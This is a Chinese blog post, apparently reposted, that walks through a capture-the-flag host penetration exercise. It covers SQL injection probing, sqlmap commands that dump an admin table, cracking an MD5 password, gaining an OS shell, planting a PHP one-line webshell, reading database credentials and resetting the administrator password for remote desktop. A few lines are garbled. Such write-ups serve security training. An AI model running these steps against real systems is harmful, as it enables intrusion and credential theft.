CTF主机渗透的方法是什么


这篇文章主要介绍了CTF主机渗透的方法是什么的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇CTF主机渗透的方法是什么文章都会有所收获,下面我们一起来看看吧。第一步:首先打开连接地址:http://202.0.0.207第二步:寻找漏洞点,点击页面的时候,我们看到是PHP的网站,以及url中的参数名为cid,那我们可以使用sql注入试试,看是否存在sql注入漏洞我们使用手工判断方法:http://202.0.0.207/product.php?cid=3’,页面异常http://202.0.0.207/product.php?cid=3 and 1=1,正常http://202.0.0.207/product.php?cid=3 and 1=2,异常从而判断此处一定存在sql注入漏洞,且参数类型为整型。这里我们可以使用盲注来手工注入。因为sqlmap也支持盲注类型,所有为了节约时间我们就使用sqlmap来脱库吧!第二步:使用sqlmap来脱库sqlmap -u http://202.0.0.207/product.php?cid=3此参数爆出时间盲注和联合注入攻击可以实现。接下来我们直接开始跑库吧sqlmap -u http://202.0.0.207/product.php?cid=3 –dbs我们选择510cms数据库来爆吧sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms –tables再来爆510_admin试试sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -T 510_admin –columns接下来爆数据sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -T 510_admin -C id,mid,name,passwd,remark –dump然后我们想要admin用户的密码:8dbdf8221fcf4bd6ac5a48317baa948c,在线MD5解密后得到密码免费云主机域名为adminlwphp第三步:我们接下来就去找后台登录页面了这里我使用御剑后台扫描器首先我们还是看登录页面的源码,看是不是有flag,果然如此,在这里拿到一个flag3{d3eac3a68b7d3863cc7bd45ba948195d}接下来我们使用爆库出来的管理员账户和密码登录:admin/ adminlwphp,登录成功第四步:胡乱捣腾进入后台后,现在也只有到处去收集有用信息,看下有没有直接拿flag的地方了。一不小心,突然看到了网站绝对路径C:/www/,那根据前面爆出的sql注入漏洞,我们能不能拿到cmdshell呢?我们接下来尝试一下sqlmap -u http://202.0.0.207/product.php?cid=3 –os-shell果然拿到了cmdshell,真XX是一个惊喜,那么我们接下就看下现在拥有的系统权限是什么第五步:一句话木马上传及利用接下来就直接写入一句话木马了echo ^>C:/WWW/shell.php接下来我们上菜刀工具连接成功第六步:胡乱捣腾下面看到这么多页面心头就开始发慌,又得漫山遍野的去收集flag了,在网站根目录发现flag.php文件,发现flag1=flag1{6ab7c0c46b171d04f1cab922c2f9f017}花了10多分钟,再也没有找到flag,那只有想其他的办法了。在configs中找到config.php,这个是数据库的配置文件,我们得到了数据库连接的账户root密码为windpasssql我们使用菜刀对数据库进行连接提交后,连接成功继续看这里有没有flag,又拿到一个flag=flag2{981c05134c56092b83b3e9c9b4116ac1}我们使用菜刀工具进入虚拟终端,看下目前的权限是什么,需要提权不?结果发现是system权限,执行命令netstat -an查看3389端口已经开启et user administrator godun.f修改管理员密码为godun.f,然后远程桌面登录远程主机拿到flag=flag4{e97950cb2dea110c53cb599abc826268}拿到了4个flag,还有一个不知道藏在哪里,我们还得继续找,找了半天,最后在,C盘的根目录下找到了flag5{c3bc1e7b8325d75816e1ca8ae5ae72ad}最后,到此为止,5个flag全部找出来了,接下来我们把5个flag放入答题框关于“CTF主机渗透的方法是什么”这篇文章的内容就介绍到这里,感谢各位的阅读!相信大家对“CTF主机渗透的方法是什么”知识都有一定的了解,大家如果还想学习更多知识,欢迎关注云编程开发博客行业资讯频道。

相关推荐: iOS应用安装失败的原因排查

本篇文章为大家展示了iOS应用安装失败的原因排查,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。iOS应用安装失败原因排查1 .在 iOS 9 中启动应用时,出现提示“未受信任的企业级开发者”2.在 iOS 9 中点击“…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

(0)
打赏 微信扫一扫 微信扫一扫
上一篇 02/06 10:44
下一篇 02/06 10:45